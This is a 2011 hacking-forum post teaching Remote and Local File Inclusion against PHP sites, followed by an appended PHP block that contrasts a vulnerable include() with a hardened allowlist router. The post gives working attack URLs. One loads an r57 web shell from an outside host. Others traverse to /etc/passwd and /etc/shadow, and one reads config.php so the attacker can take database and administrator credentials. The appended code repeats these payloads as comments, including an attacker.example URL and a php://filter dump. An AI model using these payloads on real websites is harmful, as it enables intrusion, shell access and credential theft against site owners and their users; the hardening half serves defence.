ShadowNET Posted March 20, 2011

This is a guide I wrote for my board: www.leethackers.org.

What is RFI?

RFI, also known as Remote File Inclusion, can be used to execute PHP code from a remote host. This can be really useful. For example:

www.target.com/index.php?page=index.txt

Here we see that it takes the text of the text file "index.txt" and places it into index.php. It is the include() PHP function. Sadly, no one thought about security while doing this. As I already said, it gets the text of index.txt and places the code into index.php. What if we change index.txt to a remote server, for example:

www.t00ls.org/r57.txt <--- This is a web shell.

So basically, it should look like this now:

www.target.com/index.php?page=www.t00ls.org/r57.txt

If the target is vulnerable, you should see a web shell on the page without injecting it or uploading a file! That easy.

What is LFI?

LFI, also known as Local File Inclusion, can be used to display sensitive information from a specified file on the web host. The concept is almost the same as RFI. The only difference is that the files are on localhost. For example, we have this page:

www.target.com/index.php?page=contact.php

So it shows the contact.php form. Now let us try this:

www.target.com/index.php?page=../../../etc/passwd

If you get a page with users, then this page is vulnerable to LFI. The passwords are displayed as 'x's though. Try to check the 'shadow' file. So do this:

www.target.com/index.php?page=../../../etc/shadow

This file is normally not readable for users. It is only readable by 'root'. What you could try is getting the config.php file, which is mostly located in the include folder. So:

www.target.com/index.php?page=./include/config.php

If you have the details for the DB (server, username, password, database), you can connect to it and get the administrator password from the users or whatever table.

Hope this small explanation helped you a bit!
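The include() pattern the post describes, written out as an added example that is not part of the original post, beside a hardened version of the same page router. Two caveats a tester should keep in mind: a remote include only works when the parameter is a full URL (http://...) and the server has allow_url_include=On in php.ini, which has been Off by default since PHP 5.2; and including a PHP file such as config.php executes it rather than printing it, so to read its source through an LFI you use the php://filter wrapper to base64-encode it instead. The 'pages' directory, the allowlist entries and the file names below are assumptions for illustration.

```php
<?php
// Added example (not code from the original post). Assumes a 'pages'
// directory beside this script containing index.php and contact.php.

// --- Vulnerable: the query parameter goes straight into include() ---
// ?page=../../../etc/passwd     -> LFI via directory traversal (non-PHP file is echoed)
// ?page=http://attacker.example/r57.txt
//                               -> RFI, only if allow_url_include=On (Off by default)
// ?page=php://filter/convert.base64-encode/resource=include/config.php
//                               -> dumps the source of a PHP file instead of executing it
function vulnerable_include(string $page): void
{
    include($page);
}

// --- Hardened: map a short page name to a fixed file, never include user input ---
const PAGES = [
    'index'   => 'index.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of an allowed page, or null for anything else.
function resolve_page(string $page): ?string
{
    // Allowlist check: rejects traversal sequences, stream wrappers and URLs
    // because none of them can ever be a key of PAGES.
    if (!array_key_exists($page, PAGES)) {
        return null;
    }

    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$page]);

    // Defence in depth: even a mis-edited PAGES table cannot escape the
    // pages directory, because the resolved path must sit inside it.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function safe_include(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

safe_include($_GET['page'] ?? 'index');
```

In production, pair the allowlist with allow_url_fopen=Off / allow_url_include=Off and an open_basedir restriction in php.ini, so that even a future bug in the router cannot reach /etc/passwd or a remote host.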